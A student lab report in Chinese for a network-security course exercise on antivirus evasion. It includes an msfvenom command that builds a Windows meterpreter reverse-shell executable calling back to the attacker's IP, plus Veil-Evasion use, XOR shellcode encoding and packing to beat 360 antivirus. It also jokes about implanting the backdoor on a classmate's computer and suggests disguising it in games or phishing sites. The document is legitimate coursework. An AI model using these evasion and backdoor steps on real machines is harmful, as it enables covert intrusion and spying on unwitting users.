20154307《網絡對抗》Exp3 免殺原理與實踐
20154307《網絡對抗》Exp3 免殺原理與實踐
一、基礎問題回答
(1)殺軟是如何檢測出惡意代碼的?
基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程序當作惡意軟件。
啟發式惡意軟件檢測
基於行為的惡意軟件檢測:檢測程序是否會有一些惡意行為,如修改註冊表,更改權限等等。。
(2)免殺是做什麽?
讓攻擊程序不被殺軟查殺
(3)免殺的基本方法有哪些?
加殼
改變特征碼
二、實踐內容
1、使用msf生成後門程序的檢測
由於上一個實驗我們已經用msf生成了一個後門程序,於是我就直接用上一個後門來檢測
當然。。。結果是不容樂觀的,畢竟上次的實驗是在關閉殺軟和防火墻的情況下做的。。。。
360也無情查殺。。
用msf多次編譯檢測結果也好,這裏我就沒有截圖。。。。
2、使用veil-evasion生成後門程序的檢測
首先啊,這個部分之前,我們要先安裝veil-evasion
sudo apt-get install veil-evasion
這個命令,安裝之。。。
(過程中,下載速度和安裝速度實在無力吐槽。。。。心累)
下載安裝好以後,我們在終端輸入veil
輸入use 1進入如下界面
輸入list,查看payload模板,嗯,挺多的,有41個。。。
這裏我選擇了6
如下圖我更改了端口號和IP地址
我把它命名為4307
檢測該文件,稍微好了一點,不枉我下載和安裝了那麽久的veil
360依然無情。。。。。
3、利用shellcode編寫後門程序的檢測
在終端輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=端口號 -f exe > met.exe
把這段機器指令復制下來
我首先在linux情況下,生成了exe
檢測結果不是很樂觀啊。。。
360也攔截了他
於是我在用codeblocks做了一遍,生成的exe檢測結果比linux稍微好了一些
同時,360淪陷了,哈哈哈
4、將shellcode異或
我把之前復制出來的機器指令,和43異或,這個可以在codeblocks實現。
把異或的結果輸入buf,然後在主函數中將其在此異或
大概就像上圖那樣。。。。。這個我是在linux下完成的。。
生成的exe檢測。。結果。。。。。並沒有我想象中那麽好。。。
然後我用了codeblock。。。發現比linux下好一些。。。
我把異或的數字換成了17,發現結果稍微好了一些。。。。(這個是在codeblocks上做的)
當然,對shellcode的修改不止有異或,我們還可以逆序,或者把異或和逆序結合,我想這樣可能報病毒的概率會更低。。。但由於時間有限,我也沒做更多的嘗試。。。。。。
以上三個exe,360全部陣亡。。。。。,以下是我的回連結果。。。
可以回連的。。想到上一次實驗的窺屏。。。。。。。把這個植入同學的電腦。。。嘿嘿嘿。。
5、加殼
我把上一次veil生成的exe,加了殼。。。。額。。。
下面這個是加殼之前的。。。。。
崩潰了,邊上的同學加殼以後報病毒是0。。。0。。。。
綜上,這次實驗就做完了。。
三、離實戰還缺些什麽技術或步驟?
我覺得shellcode的異或已經可以欺騙一部分用戶了,例如360的用戶。雖然報病毒的概率還有待降低。當然,把攻擊程序裝入靶機還是需要一定的技術的,例如把他藏在一個什麽遊戲之下(貪玩藍月),或是一些釣魚網站。。。。然後隨著殺毒軟件的庫在不斷更新,我們的技術也不能一直使用,也要同時去更新。
四、實驗總結與體會
360確實不夠厲害,而且我們也不能完全把電腦的安全依賴於殺軟,殺軟只能用於病毒的防範,病毒的防範,還是要看自己,在上網,玩遊戲的時候要有安全意識。
同時,我們做的免殺還是比較基礎的,在免殺的制作和防範上,我們要走的路還是很遠的。。。。
嗯,這次實驗還是很有意思的。。。。
20154307《網絡對抗》Exp3 免殺原理與實踐